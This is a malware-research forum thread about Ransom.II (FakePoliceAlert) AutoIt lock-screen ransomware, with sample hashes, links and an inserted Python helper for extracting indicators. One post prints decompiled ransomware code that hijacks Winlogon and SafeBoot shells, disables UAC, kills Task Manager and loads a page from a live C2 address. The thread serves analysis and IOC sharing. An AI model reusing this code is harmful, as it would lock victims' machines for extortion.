AutoIt/LockScreen

Postby thisisu » Mon Jun 04, 2012 8:06 am

Celas
MD5: a7768f4973ad7cf8217212a4d12dbae0
https://www.virustotal.com/file/c8ea293 ... /analysis/

thisisu
 
Posts: 362
Joined: Sun Feb 26, 2012 8:57 am
Reputation point: 65

Re: Trojan Ransom / FakePoliceAlert

Postby Kafeine » Mon Jun 04, 2012 8:22 am

thisisu wrote: Celas

Here on botnets.fr :
https://www.botnets.fr/index.php/Ransom.II
Kafeine
 
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm
Reputation point: 74

Re: Trojan Ransom / FakePoliceAlert

Postby thisisu » Mon Jun 11, 2012 12:32 am

"Celas" - Ransom.II
MD5: 941d0697b844414be106b7a397d31fd6
https://www.virustotal.com/file/8801cce ... /analysis/

Re: Trojan Ransom / FakePoliceAlert

Postby tachion » Mon Jun 11, 2012 5:16 pm

Next Ransom II - Celas :)
tachion
 
Posts: 32
Joined: Sat Dec 24, 2011 10:03 am
Reputation point: 14

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Tue Jun 12, 2012 1:41 pm

Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Trojan:AutoIt/LockScreen

Postby Win32:Virut » Sun Jul 08, 2012 7:52 pm

Ransom.II

MD5: F74E910C368717E9ACEF3A1B9A1A9F03

Screenshots: https://www.botnets.fr/index.php/Ransom.II

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Mon Jul 09, 2012 1:50 pm

Trojan:Win32/Ransom.II

MD5: 5D18E789AFED967531372ACCBB7152A2

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Fri Aug 17, 2012 1:36 pm

Ransom.II

MD5: 82B192B07B32D0E77B1F2B21F17283E6

https://www.virustotal.com/file/edd206f ... /analysis/

Re: Trojan Ransom / FakePoliceAlert

Postby thisisu » Tue Nov 13, 2012 1:02 am

Win32:Virut wrote: Ransom.II

MD5: F74E910C368717E9ACEF3A1B9A1A9F03

Screenshots: https://www.botnets.fr/index.php/Ransom.II


Parts of decompiled AutoIt script. / Highlights?
Code:
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut3E.tmp

$UNDERGROUND = "brasilia"
$SWISS = "germany"

ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
If @OSVersion = "WIN_7" Or @OSVersion = "WIN_VISTA" Then
   If @OSArch = "X64" Then
      RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
   Else
      RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
   EndIf
EndIf
$ASHELL = RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell")
If $ASHELL <> @ScriptFullPath Then
   If @OSVersion <> "WIN_7" Or @OSVersion = "WIN_VISTA" Then
      RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
   EndIf
   RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
   RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
   RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
   RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
$SHELL = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
If $SHELL <> @ScriptFullPath Then
   FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk")
EndIf
$OIE = ObjCreate("Shell.Explorer.2")
$HGUI = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $WS_POPUP + $WS_EX_TOOLWINDOW, $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW)
$GUIACTIVEX = GUICtrlCreateObj($OIE, 0, 0, @DesktopWidth, @DesktopHeight)
GUISetBkColor(1, $HGUI)
GUISetState()
$OIE.navigate($URL)
_WinAPI_SetLayeredWindowAttributes($HGUI, 1, 255, 3)
Local $TIMER, $DIFF
$TIMER = TimerInit()
While 1
   $DIFF = TimerDiff($TIMER)
   If $DIFF > 150 Then
      If ProcessExists("taskmgr.exe") Then
         ProcessClose("taskmgr.exe")
      EndIf
      If ProcessExists("explorer.exe") Then
         Run(@ComSpec & " /c " & "taskkill /f /im explorer.exe", "", @SW_HIDE)
      EndIf
      $DIFF = 0
      $TIMER = TimerInit()
   EndIf
   WinSetOnTop($HGUI, "", 1)
   WinActivate($HGUI)
WEnd


Full decompile in attachment.

You can add this IP: 95.163.104.88 to your page Kafeine :)
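Added triage helper, not part of thisisu's post or the attached decompile: it reads decompiled AutoIt text of the kind quoted above and pulls out the C2 URL, the processes the script kills and every RegWrite, flagging the Winlogon Shell, SafeBoot AlternateShell and EnableLUA changes this family relies on. SAMPLE_SCRIPT is a constructed excerpt in the same shape, so the regexes and key matching are assumptions about that format.

```python
import re

# Constructed sample in the shape of the decompiled AutoIt lockscreen quoted
# in the post above (a few representative lines, not the full decompile).
SAMPLE_SCRIPT = r'''
ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
'''

REGWRITE = re.compile(r'RegWrite\("([^"]+)",\s*"([^"]+)",\s*"([^"]+)",\s*([^)]+)\)')
PROCCLOSE = re.compile(r'ProcessClose\("([^"]+)"\)')
URLVAR = re.compile(r'\$URL\s*=\s*"([^"]+)"')

def classify(key, name, data):
    """Return a finding if this RegWrite matches a technique seen in this family."""
    k, n = key.lower(), name.lower()
    if k.endswith("\\winlogon") and n == "shell":
        return f"Winlogon Shell replaced with {data}: runs instead of explorer.exe at logon"
    if k.endswith("\\safeboot") and n == "alternateshell":
        return f"SafeBoot AlternateShell replaced with {data}: survives Safe Mode with Command Prompt"
    if k.endswith("\\policies\\system") and n == "enablelua" and data == "0":
        return "EnableLUA set to 0: UAC disabled"
    return None

def extract_iocs(script):
    """Pull network, process and registry indicators out of decompiled AutoIt text."""
    urls = URLVAR.findall(script)
    registry, findings = [], []
    for key, name, vtype, data in REGWRITE.findall(script):
        data = data.strip().strip('"')  # "0" -> 0, @ScriptFullPath stays as-is
        registry.append((key, name, vtype, data))
        finding = classify(key, name, data)
        if finding:
            findings.append(finding)
    return {
        "urls": urls,
        "hosts": sorted({u.split("/", 1)[0] for u in urls}),  # host part, for blocklists
        "killed_processes": PROCCLOSE.findall(script),
        "registry": registry,
        "findings": findings,
    }
```

The same registry paths are what to check on a suspect host: a Winlogon Shell or SafeBoot AlternateShell value that is not the default is the persistence to undo before the lock screen can be removed.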

Re: Trojan Ransom / FakePoliceAlert

Postby thisisu » Tue Nov 13, 2012 1:35 am

Win32:Virut wrote: Ransom.II

MD5: 82B192B07B32D0E77B1F2B21F17283E6

https://www.virustotal.com/file/edd206f ... /analysis/


Lots of interesting code in this one IMO. I just picked a small amount so it doesn't lag the thread.
Code:
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut7B.tmp

If FileExists(@AppDataDir & "1.exe") Then
   $HAFTBEFEHLAAT = "haftbefehlaat"
   $URL = "95.163.104.87/aff14/start.php"


Full decompile in attachment.
